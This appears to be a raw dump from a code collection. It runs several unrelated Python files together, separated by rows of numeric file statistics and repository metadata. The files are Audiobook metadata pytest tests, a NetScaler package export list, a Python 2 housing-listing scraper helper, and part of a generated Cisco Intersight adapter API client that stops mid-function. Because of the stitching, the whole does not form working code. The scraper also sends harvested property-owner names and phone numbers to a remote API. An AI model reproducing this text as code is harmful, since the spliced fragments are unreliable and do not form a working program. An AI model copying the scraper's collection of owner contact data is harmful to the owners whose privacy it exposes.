with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "duration": -45,
"author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'duration' - not positive"
def test_Audiobook_invalid_author():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'author' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'author' field not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": 1,
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'author' - not an str"
# Test for 'author' field too long
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1" * 20,
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'author' - str too long"
def test_Audiobook_invalid_narrator():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'narrator' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'narrator' field not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1",
"duration": 45, "narrator": 1})
assert str(error.value) == "metadata value is invalid for 'narrator' - not an str"
# Test for 'narrator' field too long
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1",
"duration": 45, "narrator": "narrator1" * 20})
assert str(error.value) == "metadata value is invalid for 'narrator' - str too long"
def test_Audiobook_extra_uploadtime():
"""
**GIVEN** a metadata dictionary for Audiobook that has an 'uploadtime' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate
error for invalid values and check attribute type and values for valid values
"""
# Test for valid 'uploadtime'
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "narrator": "narrator1",
"uploadtime": "2021-01-01", "author": "author1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-2021-01-01T00:00:00"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert audiobook.uploadtime == datetime.datetime.fromisoformat("2021-01-01")
# Test for 'uploadtime' not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-song", "duration": 45, "author": "author1",
"uploadtime": 3453, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'uploadtime' - not an str"
# Test for 'uploadtime' not an ISO8601 string
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-song", "duration": 45, "author": "author1",
"uploadtime": "3453", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'uploadtime' - not ISO8601"
def test_Audiobook_extra_ID():
"""
**GIVEN** a metadata dictionary for Audiobook that has an 'ID' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate
error for invalid values and check attribute type and values for valid values
"""
# Test for valid '_id'
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "_id": 23214241,
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == 23214241
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
# Test for '_id' not an int
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-song", "duration": 45, "_id": "3453",
"author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for '_id' - not an int"
def test_Audiobook_extra_type():
"""
**GIVEN** a metadata dictionary for Audiobook that has an 'type' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate
error for invalid values and check attribute type and values for valid values
"""
# Test Case 1 - valid 'Audiobook' type
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "type": "Audiobook",
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert isinstance(audiobook.metadata['type'], str)
assert audiobook.metadata['type'] == "Audiobook"
# Test Case 2 - invalid 'Album' type - Audiobook() will overwrite
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "type": "Album",
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert isinstance(audiobook.metadata['type'], str)
assert audiobook.metadata['type'] == "Audiobook"
# Test Case 3 - invalid value and type 3423 - Audiobook() will overwrite
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "type": 3423,
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert isinstance(audiobook.metadata['type'], str)
assert audiobook.metadata['type'] == "Audiobook"
| 43.332203 | 99 | 0.6705 | 1,467 | 12,783 | 5.822086 | 0.064758 | 0.084299 | 0.131718 | 0.059009 | 0.896031 | 0.871209 | 0.864067 | 0.864067 | 0.851305 | 0.824025 | 0 | 0.019777 | 0.208871 | 12,783 | 294 | 100 | 43.479592 | 0.82478 | 0.22749 | 0 | 0.664596 | 0 | 0 | 0.240583 | 0.023933 | 0 | 0 | 0 | 0 | 0.590062 | 1 | 0.055901 | false | 0 | 0.024845 | 0 | 0.080745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
859ef27d97f0365427eda9e4c6f9e1b154650595 | 442 | py | Python | nssrc/com/citrix/netscaler/nitro/resource/config/rewrite/__init__.py | benfinke/ns_python | d651d7aa01d7dc63c1cd435c7b3314d7f5b26659 | [
"Apache-2.0"
] | 2 | 2020-08-24T18:04:22.000Z | 2020-08-24T18:04:47.000Z | nssrc/com/citrix/netscaler/nitro/resource/config/rewrite/__init__.py | benfinke/ns_python | d651d7aa01d7dc63c1cd435c7b3314d7f5b26659 | [
"Apache-2.0"
] | 1 | 2017-01-20T22:56:58.000Z | 2017-01-20T22:56:58.000Z | nssrc/com/citrix/netscaler/nitro/resource/config/rewrite/__init__.py | benfinke/ns_python | d651d7aa01d7dc63c1cd435c7b3314d7f5b26659 | [
"Apache-2.0"
] | 6 | 2015-04-21T13:14:08.000Z | 2020-12-03T07:27:52.000Z | __all__ = ['rewriteaction', 'rewriteglobal_binding', 'rewriteglobal_rewritepolicy_binding', 'rewriteparam', 'rewritepolicy', 'rewritepolicy_binding', 'rewritepolicy_csvserver_binding', 'rewritepolicy_lbvserver_binding', 'rewritepolicy_rewriteglobal_binding', 'rewritepolicy_rewritepolicylabel_binding', 'rewritepolicylabel', 'rewritepolicylabel_binding', 'rewritepolicylabel_policybinding_binding', 'rewritepolicylabel_rewritepolicy_binding'] | 442 | 442 | 0.866516 | 32 | 442 | 11.3125 | 0.3125 | 0.220994 | 0.237569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033937 | 442 | 1 | 442 | 442 | 0.847775 | 0 | 0 | 0 | 0 | 0 | 0.848758 | 0.722348 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
85bf74acac3eca6c1384e85a4a2d12af80b34c02 | 11,902 | py | Python | src/dev/spider/common.py | ptphp/PyLib | 07ac99cf2deb725475f5771b123b9ea1375f5e65 | [
"Apache-2.0"
] | 1 | 2020-02-17T08:18:29.000Z | 2020-02-17T08:18:29.000Z | src/dev/spider/common.py | ptphp/PyLib | 07ac99cf2deb725475f5771b123b9ea1375f5e65 | [
"Apache-2.0"
] | null | null | null | src/dev/spider/common.py | ptphp/PyLib | 07ac99cf2deb725475f5771b123b9ea1375f5e65 | [
"Apache-2.0"
] | null | null | null | #coding=UTF-8
'''
Created on 2011-7-13
@author: Administrator
'''
import urllib
import urllib2,time
from jjrlog import msglogger
def postHost(res):
# print "*"*40
if res and res['house_title']:
res1={}
req=urllib2.Request("http://my.lianxiao.com/Manage/houseApi?"+urllib.urlencode(res))
br=urllib2.build_opener()
try:
p=br.open(req).read().strip()
except Exception ,eeer:
print "postHost Exception %s"%eeer
p=None
rs=p
# if p!=None :
#rs=unicode(p,"GB18030",errors="ignore")
try:
msglogger.debug("%s---->%s"%(res,rs))
except:
print "Exception -------->%s"%res
return rs
def postHost1(res):
if res==None:
return
res1={}
req=urllib2.Request("http://my.lianxiao.com/manage/houseApi", urllib.urlencode(res))
br=urllib2.build_opener()
try:
p=br.open(req).read().strip()
except:
p=None
rs=""
if p!=None :
rs=unicode(p,"GB18030",errors="ignore")
try:
msglogger.debug("%s---->%s"%(res,rs))
except:
print "Exception -------->%s"%res
return rs
def printRsult(dict,kind):
print "++++++++++++++++++++++++++++++++++++"
"""
出售 求购 house_depoit(压金) 没有此键
出租求租 house_belong(产权) 没有此键
出售 出租 无 house_price_max house_area_max
求购 求租 无 house_price_max house_area_max
如果价格采到的格式为 0-2000或者2000以下 则:
house_price_max = 0
house_price_max = 2000
如果价格采到的格式为 2000-3000则:
house_price_max = 2000
house_price_max = 3000
如果价格采到的格式为 3000以上则:
house_price_max = 3000
house_price_max = 0
面积同价格
"""
if kind == "1":#出售
print 'house_flag' +dict['house_flag'], #房源标识 INTERGER 1:出售 2:出租 3:求购 4:求租
print 'borough_name' +dict['borough_name'] #小区名 VARCHAR 不为空
print 'house_addr' +dict['house_addr'] #地址 VARCHAR
print 'house_title' +dict['house_title'] #标题 VARCHAR 不为空
print 'house_city' +dict['house_city'], #城市 VARCHAR 不为空 如:苏州
print 'house_region' +dict['house_region'] #区 VARCHAR 不为空
print 'house_section' +dict['house_section'] #版块 VARCHAR
print 'house_type' +dict['house_type'] #房源类型 INTERGER
print 'house_price' +dict['house_price'] #价格 FLOAT 不为空 default 0
print 'house_area' +dict['house_area'] #面积 FLOAT
print 'house_room' +dict['house_room'] #室 INTERGER
print 'house_hall' +dict['house_hall'] #厅 INTERGER
print 'house_toilet' +dict['house_toilet'] #卫 INTERGER
print 'house_veranda' +dict['house_veranda'] #阳台 INTERGER
print 'house_topfloor' +dict['house_topfloor'] #总层 INTERGER
print 'house_floor' +dict['house_floor'] #层 INTERGER
print 'house_age' +dict['house_age'] #房龄 INTERGER 为四位数 如:2001年 如果采到房龄为8年,则算出值为:2011-8 = 2003
print 'house_toward' +dict['house_toward'] #朝向 INTERGER
print 'house_fitment' +dict['house_fitment'] #装修 INTERGER
print 'house_feature' +dict['house_feature'] #特色 VARCHAR 字典键值用,分隔 如: 1,2,3
print 'house_belong' +dict['house_belong'] #产权 INTERGER
print 'house_desc' +dict['house_desc'] #描述 VARCHAR
print 'owner_name' +dict['owner_name'] #业主名 VARCHAR
print 'owner_phone' +dict['owner_phone'] #业主手机 VARCHAR 搜房电话为数字 搜房必须
print 'owner_phone_pic' +dict['owner_phone_pic'] #业主手机图片 VARCHAR 58赶集电话为图片地址 必须
print 'house_posttime' +dict['house_posttime'] #房源发布时间 VARCHAR 如果没有采到发布时间 则设为当前时间 unix 时间戳
if kind == "2":#出租
print 'house_flag' +dict['house_flag'], #房源标识 INTERGER 1:出售 2:出租 3:求购 4:求租
print 'borough_name' +dict['borough_name'] #小区名 VARCHAR 不为空
print 'house_addr' +dict['house_addr'] #地址 VARCHAR
print 'house_title' +dict['house_title'] #标题 VARCHAR 不为空
print 'house_city' +dict['house_city'], #城市 VARCHAR 不为空 如:苏州
print 'house_region' +dict['house_region'] #区 VARCHAR 不为空
print 'house_section' +dict['house_section'] #版块 VARCHAR
print 'house_type' +dict['house_type'] #房源类型 INTERGER
print 'house_price' +dict['house_price'] #价格 FLOAT 不为空 default 0
print 'house_area' +dict['house_area'] #面积 FLOAT
print 'house_deposit' +dict['house_deposit'] #付款方式 INTERGER
print 'house_room' +dict['house_room'] #室 INTERGER
print 'house_hall' +dict['house_hall'] #厅 INTERGER
print 'house_toilet' +dict['house_toilet'] #卫 INTERGER
print 'house_veranda' +dict['house_veranda'] #阳台 INTERGER
print 'house_topfloor' +dict['house_topfloor'] #总层 INTERGER
print 'house_floor' +dict['house_floor'] #层 INTERGER
print 'house_age' +dict['house_age'] #房龄 INTERGER 为四位数 如:2001年 如果采到房龄为8年,则算出值为:2011-8 = 2003
print 'house_toward' +dict['house_toward'] #朝向 INTERGER
print 'house_fitment' +dict['house_fitment'] #装修 INTERGER
print 'house_feature' +dict['house_feature'] #特色 VARCHAR 字典键值用,分隔 如: 1,2,3
print 'house_desc' +dict['house_desc'] #描述 VARCHAR
print 'owner_name' +dict['owner_name'] #业主名 VARCHAR
print 'owner_phone' +dict['owner_phone'] #业主手机 VARCHAR 搜房电话为数字 搜房必须
print 'owner_phone_pic' +dict['owner_phone_pic'] #业主手机图片 VARCHAR 58赶集电话为图片地址 必须
print 'house_posttime' +dict['house_posttime'] #房源发布时间 VARCHAR 如果没有采到发布时间 则设为当前时间 unix 时间戳
if kind == "3":#求购
print 'house_flag' +dict['house_flag'], #房源标识 INTERGER 1:出售 2:出租 3:求购 4:求租
print 'borough_name' +dict['borough_name'] #小区名 VARCHAR 不为空
print 'house_addr' +dict['house_addr'] #地址 VARCHAR
print 'house_title' +dict['house_title'] #标题 VARCHAR 不为空
print 'house_city' +dict['house_city'], #城市 VARCHAR 不为空 如:苏州
print 'house_region' +dict['house_region'] #区 VARCHAR 不为空
print 'house_section' +dict['house_section'] #版块 VARCHAR
print 'house_type' +dict['house_type'] #房源类型 INTERGER
print 'house_price' +dict['house_price'] #价格 FLOAT 不为空 default 0
print 'house_price_max' +dict['house_price_max'] #最大价格 FLOAT 不为空 default 0
print 'house_area' +dict['house_area'] #面积 FLOAT default 0
print 'house_area_max' +dict['house_area_max'] #最大面积 FLOAT default 0
print 'house_room' +dict['house_room'] #室 INTERGER 如果采到非数字的室 则用分号分隔 如 1,2,3,
print 'house_hall' +dict['house_hall'] #厅 INTERGER
print 'house_toilet' +dict['house_toilet'] #卫 INTERGER
print 'house_veranda' +dict['house_veranda'] #阳台 INTERGER
print 'house_topfloor' +dict['house_topfloor'] #总层 INTERGER
print 'house_floor' +dict['house_floor'] #层 INTERGER
print 'house_age' +dict['house_age'] #房龄 INTERGER 为四位数 如:2001年 如果采到房龄为8年,则算出值为:2011-8 = 2003
print 'house_toward' +dict['house_toward'] #朝向 INTERGER
print 'house_fitment' +dict['house_fitment'] #装修 INTERGER
print 'house_feature' +dict['house_feature'] #特色 VARCHAR 字典键值用,分隔 如: 1,2,3
print 'house_belong' +dict['house_belong'] #产权 INTERGER
print 'house_desc' +dict['house_desc'] #描述 VARCHAR
print 'owner_name' +dict['owner_name'] #业主名 VARCHAR
print 'owner_phone' +dict['owner_phone'] #业主手机 VARCHAR 搜房电话为数字 搜房必须
print 'owner_phone_pic' +dict['owner_phone_pic'] #业主手机图片 VARCHAR 58赶集电话为图片地址 必须
print 'house_posttime' +dict['house_posttime'] #房源发布时间 VARCHAR 如果没有采到发布时间 则设为当前时间 unix 时间戳
if kind == "4":#求租
print 'house_flag' +dict['house_flag'], #房源标识 INTERGER 1:出售 2:出租 3:求购 4:求租
print 'borough_name' +dict['borough_name'] #小区名 VARCHAR 不为空
print 'house_addr' +dict['house_addr'] #地址 VARCHAR
print 'house_title' +dict['house_title'] #标题 VARCHAR 不为空
print 'house_city' +dict['house_city'], #城市 VARCHAR 不为空 如:苏州
print 'house_region' +dict['house_region'] #区 VARCHAR 不为空
print 'house_section' +dict['house_section'] #版块 VARCHAR
print 'house_type' +dict['house_type'] #房源类型 INTERGER
print 'house_price' +dict['house_price'] #价格 FLOAT 不为空 default 0
print 'house_price_max' +dict['house_price_max'] #最大价格 FLOAT 不为空 default 0
print 'house_area' +dict['house_area'] #面积 FLOAT default 0
print 'house_area_max' +dict['house_area_max'] #最大面积 FLOAT default 0
print 'house_deposit' +dict['house_deposit'] #付款方式 INTERGER
print 'house_room' +dict['house_room'] #室 VARCHAR 如果采到非数字的室 则用分号分隔 如 1,2,3,
print 'house_hall' +dict['house_hall'] #厅 INTERGER
print 'house_toilet' +dict['house_toilet'] #卫 INTERGER
print 'house_veranda' +dict['house_veranda'] #阳台 INTERGER
print 'house_topfloor' +dict['house_topfloor'] #总层 INTERGER
print 'house_floor' +dict['house_floor'] #层 INTERGER
print 'house_age' +dict['house_age'] #房龄 INTERGER 为四位数 如:2001年 如果采到房龄为8年,则算出值为:2011-8 = 2003
print 'house_toward' +dict['house_toward'] #朝向 INTERGER
print 'house_fitment' +dict['house_fitment'] #装修 INTERGER
print 'house_feature' +dict['house_feature'] #特色 VARCHAR 字典键值用,分隔 如: 1,2,3
print 'house_desc' +dict['house_desc'] #描述 VARCHAR
print 'owner_name' +dict['owner_name'] #业主名 VARCHAR
print 'owner_phone' +dict['owner_phone'] #业主手机 VARCHAR 搜房电话为数字 搜房必须
print 'owner_phone_pic' +dict['owner_phone_pic'] #业主手机图片 VARCHAR 58赶集电话为图片地址 必须
print 'house_posttime' +dict['house_posttime'] #房源发布时间 VARCHAR 如果没有采到发布时间 则设为当前时间 unix 时间戳
| 62.314136 | 128 | 0.51546 | 1,293 | 11,902 | 4.546017 | 0.126063 | 0.156516 | 0.116366 | 0.04083 | 0.917999 | 0.917999 | 0.917999 | 0.909153 | 0.90473 | 0.90473 | 0 | 0.024311 | 0.381364 | 11,902 | 190 | 129 | 62.642105 | 0.774005 | 0.313057 | 0 | 0.854305 | 0 | 0 | 0.3569 | 0.004713 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.019868 | null | null | 0.748344 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
a436f99d0ae52b6c10eee6fd6acabb26ce07e5c5 | 139,283 | py | Python | intersight/api/adapter_api.py | sdnit-se/intersight-python | 551f7685c0f76bb8af60ec83ffb6f9672d49a4ae | [
"Apache-2.0"
] | 21 | 2018-03-29T14:20:35.000Z | 2021-10-13T05:11:41.000Z | intersight/api/adapter_api.py | sdnit-se/intersight-python | 551f7685c0f76bb8af60ec83ffb6f9672d49a4ae | [
"Apache-2.0"
] | 14 | 2018-01-30T15:45:46.000Z | 2022-02-23T14:23:21.000Z | intersight/api/adapter_api.py | sdnit-se/intersight-python | 551f7685c0f76bb8af60ec83ffb6f9672d49a4ae | [
"Apache-2.0"
] | 18 | 2018-01-03T15:09:56.000Z | 2021-07-16T02:21:54.000Z | # coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from intersight.api_client import ApiClient
from intersight.exceptions import (ApiTypeError, ApiValueError)
class AdapterApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_adapter_config_policy(self, adapter_config_policy,
**kwargs): # noqa: E501
"""Create a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_adapter_config_policy(adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to create. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_adapter_config_policy_with_http_info(
adapter_config_policy, **kwargs) # noqa: E501
def create_adapter_config_policy_with_http_info(self,
adapter_config_policy,
**kwargs): # noqa: E501
"""Create a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_adapter_config_policy_with_http_info(adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to create. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['adapter_config_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method create_adapter_config_policy" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'adapter_config_policy' is set
if self.api_client.client_side_validation and (
'adapter_config_policy' not in local_var_params
or # noqa: E501
local_var_params['adapter_config_policy'] is None
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `adapter_config_policy` when calling `create_adapter_config_policy`"
) # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'adapter_config_policy' in local_var_params:
body_params = local_var_params['adapter_config_policy']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies',
'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_adapter_config_policy(self, moid, **kwargs): # noqa: E501
"""Delete a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_adapter_config_policy(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_adapter_config_policy_with_http_info(
moid, **kwargs) # noqa: E501
def delete_adapter_config_policy_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Delete a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_adapter_config_policy_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method delete_adapter_config_policy" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `delete_adapter_config_policy`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies/{Moid}',
'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_config_policy_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_config_policy_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_config_policy_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
